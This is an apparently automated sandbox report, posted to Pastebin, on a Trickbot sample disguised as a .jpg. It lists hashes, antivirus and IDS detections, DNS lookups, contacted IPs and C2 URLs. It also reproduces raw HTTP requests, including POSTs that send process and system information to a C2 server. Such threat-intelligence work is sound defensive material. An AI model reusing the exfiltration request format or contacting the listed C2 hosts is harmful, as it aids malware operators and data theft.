Advertisement
paladin316

1483Trickbot_91775a72b3877ffa24785d81d77ea9a7_jpg_2019-09-10_14_30.txt

Sep 10th, 2019
1,701
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 9.91 KB | None | 0 0
  1.  
  2. * ID: 1483
  3. * MalFamily: "Ptsecurity"
  4.  
  5. * MalScore: 10.0
  6.  
  7. * File Name: "Trickbot_91775a72b3877ffa24785d81d77ea9a7.jpg"
  8. * File Size: 19456
  9. * File Type: "PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows"
  10. * SHA256: "7ead351f7fe75c4d623d8cec8929516928b6b138b3b6150949ea2ec031ab47ac"
  11. * MD5: "91775a72b3877ffa24785d81d77ea9a7"
  12. * SHA1: "dd34ac62db9476b4a319391bf75fe8114b4101b7"
  13. * SHA512: "1c247c7f3782923efc7b1c067f269ac2e84f276e2f2ac86377b9f0d8d203e6b28dc4e22a0d0e3f23f585f8cc2d4ec00a6945569ccc9b1fa05f0ace817ed68d0a"
  14. * CRC32: "008D7BA2"
  15. * SSDEEP: "384:9VfD8hT4IPLax88G0fXvNY0w1YZbDkat:8hTxPmx9vuP1ObDk0"
  16.  
  17. * Process Execution:
  18.  
  19. * Executed Commands:
  20.  
  21. * Signatures Detected:
  22.  
  23. "Description": "File has been identified by 4 Antiviruses on VirusTotal as malicious",
  24. "Details":
  25.  
  26. "Endgame": "malicious (high confidence)"
  27.  
  28.  
  29. "FireEye": "Generic.mg.91775a72b3877ffa"
  30.  
  31.  
  32. "SentinelOne": "DFI - Malicious PE"
  33.  
  34.  
  35. "CrowdStrike": "win/malicious_confidence_80% (D)"
  36.  
  37.  
  38.  
  39.  
  40. "Description": "Multiple direct IP connections",
  41. "Details":
  42.  
  43. "direct_ip_connections": "Made direct connections to 7 unique IP addresses"
  44.  
  45.  
  46.  
  47.  
  48. "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
  49. "Details":
  50.  
  51. "post_no_referer": "HTTP traffic contains a POST request with no referer header"
  52.  
  53.  
  54. "ip_hostname": "HTTP connection was made to an IP address rather than domain name"
  55.  
  56.  
  57. "suspicious_request_iocs": "http://69.16.254.181/JdNG9d"
  58.  
  59.  
  60. "suspicious_request_iocs": "http://hrpm.ca/images/result.php"
  61.  
  62.  
  63. "suspicious_request_iocs": "http://170.238.117.187:8082/wmd14/Host_W617601.557B9DE766197733FF717FEDDF1F3D5D/90"
  64.  
  65.  
  66. "suspicious_request_iocs": "http://170.238.117.187:8082/wmd14/Host_W617601.557B9DE766197733FF717FEDDF1F3D5D/83/"
  67.  
  68.  
  69.  
  70.  
  71. "Description": "Performs some HTTP requests",
  72. "Details":
  73.  
  74. "url_iocs": "http://69.16.254.181/JdNG9d"
  75.  
  76.  
  77. "url_iocs": "http://hrpm.ca/images/result.php"
  78.  
  79.  
  80. "url_iocs": "http://170.238.117.187:8082/wmd14/Host_W617601.557B9DE766197733FF717FEDDF1F3D5D/90"
  81.  
  82.  
  83. "url_iocs": "http://170.238.117.187:8082/wmd14/Host_W617601.557B9DE766197733FF717FEDDF1F3D5D/83/"
  84.  
  85.  
  86.  
  87.  
  88. "Description": "Looks up the external IP address",
  89. "Details":
  90.  
  91. "domain": "api.ipify.org"
  92.  
  93.  
  94.  
  95.  
  96. "Description": "Created network traffic indicative of malicious activity",
  97. "Details":
  98.  
  99. "signature": "ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex/Trickbot CnC)"
  100.  
  101.  
  102. "signature": "ET CNC Feodo Tracker Reported CnC Server group 21"
  103.  
  104.  
  105. "signature": "ET CNC Feodo Tracker Reported CnC Server group 2"
  106.  
  107.  
  108. "signature": "ET CNC Feodo Tracker Reported CnC Server group 4"
  109.  
  110.  
  111. "signature": "ET TROJAN PTsecurity Trickbot Data Exfiltration"
  112.  
  113.  
  114.  
  115.  
  116.  
  117. * Started Service:
  118.  
  119. * Mutexes:
  120.  
  121. * Modified Files:
  122.  
  123. * Deleted Files:
  124.  
  125. * Modified Registry Keys:
  126.  
  127. * Deleted Registry Keys:
  128.  
  129. * DNS Communications:
  130.  
  131. "type": "A",
  132. "request": "hrpm.ca",
  133. "answers":
  134.  
  135. "data": "162.208.2.182",
  136. "type": "A"
  137.  
  138.  
  139.  
  140.  
  141. "type": "A",
  142. "request": "api.ipify.org",
  143. "answers":
  144.  
  145. "data": "54.225.92.64",
  146. "type": "A"
  147.  
  148.  
  149. "data": "23.23.83.153",
  150. "type": "A"
  151.  
  152.  
  153. "data": "54.243.198.12",
  154. "type": "A"
  155.  
  156.  
  157. "data": "nagano-19599.herokussl.com",
  158. "type": "CNAME"
  159.  
  160.  
  161. "data": "23.21.121.219",
  162. "type": "A"
  163.  
  164.  
  165. "data": "23.23.243.154",
  166. "type": "A"
  167.  
  168.  
  169. "data": "23.23.229.94",
  170. "type": "A"
  171.  
  172.  
  173. "data": "23.23.73.124",
  174. "type": "A"
  175.  
  176.  
  177. "data": "elb097307-934924932.us-east-1.elb.amazonaws.com",
  178. "type": "CNAME"
  179.  
  180.  
  181. "data": "50.19.218.16",
  182. "type": "A"
  183.  
  184.  
  185.  
  186.  
  187. "type": "A",
  188. "request": "bx56k5gep4jz7k4x.onion",
  189. "answers":
  190.  
  191. "data": "",
  192. "type": "NXDOMAIN"
  193.  
  194.  
  195.  
  196.  
  197. "type": "A",
  198. "request": "238.175.207.91.zen.spamhaus.org",
  199. "answers":
  200.  
  201.  
  202. "type": "A",
  203. "request": "238.175.207.91.cbl.abuseat.org",
  204. "answers":
  205.  
  206. "data": "127.0.0.2",
  207. "type": "A"
  208.  
  209.  
  210.  
  211.  
  212.  
  213. * Domains:
  214.  
  215. "ip": "",
  216. "domain": "bx56k5gep4jz7k4x.onion"
  217.  
  218.  
  219. "ip": "54.225.92.64",
  220. "domain": "api.ipify.org"
  221.  
  222.  
  223. "ip": "162.208.2.182",
  224. "domain": "hrpm.ca"
  225.  
  226.  
  227. "ip": "127.0.0.4",
  228. "domain": "238.175.207.91.zen.spamhaus.org"
  229.  
  230.  
  231. "ip": "127.0.0.2",
  232. "domain": "238.175.207.91.cbl.abuseat.org"
  233.  
  234.  
  235.  
  236. * Network Communication - ICMP:
  237.  
  238. * Network Communication - HTTP:
  239.  
  240. "count": 1,
  241. "body": "",
  242. "uri": "http://69.16.254.181/JdNG9d",
  243. "user-agent": "OnkyoblasterOS X-f5.99",
  244. "method": "GET",
  245. "host": "69.16.254.181",
  246. "version": "1.1",
  247. "path": "/JdNG9d",
  248. "data": "GET /JdNG9d HTTP/1.1\r\nUser-Agent: OnkyoblasterOS X-f5.99\r\nHost: 69.16.254.181\r\nConnection: Keep-Alive\r\n\r\n",
  249. "port": 80
  250.  
  251.  
  252. "count": 1,
  253. "body": "",
  254. "uri": "http://hrpm.ca/images/result.php",
  255. "user-agent": "OnkyoblasterOS X-f5.99",
  256. "method": "GET",
  257. "host": "hrpm.ca",
  258. "version": "1.1",
  259. "path": "/images/result.php",
  260. "data": "GET /images/result.php HTTP/1.1\r\nUser-Agent: OnkyoblasterOS X-f5.99\r\nHost: hrpm.ca\r\nConnection: Keep-Alive\r\n\r\n",
  261. "port": 80
  262.  
  263.  
  264. "count": 1,
  265. "body": "--Arasfjasu7\r\nContent-Disposition: form-data; name=\"proclist\"\r\n\r\nEmpty\r\n--Arasfjasu7\r\nContent-Disposition: form-data; name=\"sysinfo\"\r\n\r\n--Arasfjasu7--\r\n\r\n",
  266. "uri": "http://170.238.117.187:8082/wmd14/Host_W617601.557B9DE766197733FF717FEDDF1F3D5D/90",
  267. "user-agent": "test",
  268. "method": "POST",
  269. "host": "170.238.117.187:8082",
  270. "version": "1.1",
  271. "path": "/wmd14/Host_W617601.557B9DE766197733FF717FEDDF1F3D5D/90",
  272. "data": "POST /wmd14/Host_W617601.557B9DE766197733FF717FEDDF1F3D5D/90 HTTP/1.1\r\nContent-Type: multipart/form-data; boundary=Arasfjasu7\r\nUser-Agent: test\r\nHost: 170.238.117.187:8082\r\nContent-Length: 154\r\nCache-Control: no-cache\r\n\r\n--Arasfjasu7\r\nContent-Disposition: form-data; name=\"proclist\"\r\n\r\nEmpty\r\n--Arasfjasu7\r\nContent-Disposition: form-data; name=\"sysinfo\"\r\n\r\n--Arasfjasu7--\r\n\r\n",
  273. "port": 8082
  274.  
  275.  
  276. "count": 1,
  277. "body": "",
  278. "uri": "http://170.238.117.187:8082/wmd14/Host_W617601.557B9DE766197733FF717FEDDF1F3D5D/83/",
  279. "user-agent": "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)",
  280. "method": "POST",
  281. "host": "170.238.117.187",
  282. "version": "1.1",
  283. "path": "/wmd14/Host_W617601.557B9DE766197733FF717FEDDF1F3D5D/83/",
  284. "data": "POST /wmd14/Host_W617601.557B9DE766197733FF717FEDDF1F3D5D/83/ HTTP/1.1\r\nAccept: */*\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)\r\nHost: 170.238.117.187\r\nConnection: close\r\nContent-Type: multipart/form-data; boundary=---------ATPZKATPHMMRMNRX\r\nContent-Length: 286\r\n\r\n",
  285. "port": 8082
  286.  
  287.  
  288.  
  289. * Network Communication - SMTP:
  290.  
  291. * Network Communication - Hosts:
  292.  
  293. "country_name": "Bulgaria",
  294. "ip": "79.124.49.206",
  295. "inaddrarpa": "",
  296. "hostname": ""
  297.  
  298.  
  299. "country_name": "United States",
  300. "ip": "69.16.254.181",
  301. "inaddrarpa": "",
  302. "hostname": ""
  303.  
  304.  
  305. "country_name": "United States",
  306. "ip": "54.243.198.12",
  307. "inaddrarpa": "",
  308. "hostname": "api.ipify.org"
  309.  
  310.  
  311. "country_name": "United States",
  312. "ip": "23.94.24.196",
  313. "inaddrarpa": "",
  314. "hostname": ""
  315.  
  316.  
  317. "country_name": "Netherlands",
  318. "ip": "185.141.27.223",
  319. "inaddrarpa": "",
  320. "hostname": ""
  321.  
  322.  
  323. "country_name": "France",
  324. "ip": "178.33.26.175",
  325. "inaddrarpa": "",
  326. "hostname": ""
  327.  
  328.  
  329. "country_name": "Brazil",
  330. "ip": "170.238.117.187",
  331. "inaddrarpa": "",
  332. "hostname": ""
  333.  
  334.  
  335. "country_name": "United States",
  336. "ip": "162.208.2.182",
  337. "inaddrarpa": "",
  338. "hostname": "hrpm.ca"
  339.  
  340.  
  341. "country_name": "United States",
  342. "ip": "107.173.160.19",
  343. "inaddrarpa": "",
  344. "hostname": ""
  345.  
  346.  
  347.  
  348. * Network Communication - IRC:
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement